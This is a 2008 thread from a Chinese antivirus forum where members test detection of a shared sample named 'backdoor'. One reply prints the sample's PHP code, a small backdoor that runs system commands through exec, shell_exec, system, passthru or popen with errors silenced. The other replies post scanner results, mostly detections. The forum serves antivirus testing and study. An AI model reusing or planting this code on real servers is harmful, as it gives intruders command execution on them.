查看: 1368|回复: 7
收起左侧

[病毒样本] backdoor

[复制链接]
电影结束了
发表于 2008-7-9 23:14:34 | 显示全部楼层 |阅读模式

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
hign
头像被屏蔽
发表于 2008-7-9 23:15:21 | 显示全部楼层
一个TXT?
Kitman
发表于 2008-7-9 23:15:37 | 显示全部楼层
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL:         http://bbs.kafan.cn/attachment.p ... c9&t=1215616526
Information:         Contains a detection pattern of the (dangerous) backdoor program BDS/PHP.Small.O.12 Backdoor server programs

Generated by AntiVir WebGuard 8.0.13.0, AVE 8.1.0.64, VDF 7.0.5.81
醉一生爱妍
发表于 2008-7-9 23:16:04 | 显示全部楼层
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;


欠妳緈諨
发表于 2008-7-10 01:03:54 | 显示全部楼层
D:\病毒测试\临时解压\jpg.zip:\jpg.txt - 特征码 'Backdoor.PHP.Small.o' 被发现
D:\病毒测试\临时解压\jpg.zip

        2 文件被扫描
          (1 压缩档 1 文件)
        1 特征码被侦测
        0 可疑代码段被发现
        耗时: 0:00.120
欠妳緈諨
发表于 2008-7-10 01:04:30 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
aerbeisi
发表于 2008-7-10 01:07:52 | 显示全部楼层

NOD32 0个

markrhy
发表于 2008-7-10 08:15:35 | 显示全部楼层
红伞杀!!!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-16 00:00 , Processed in 0.131048 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表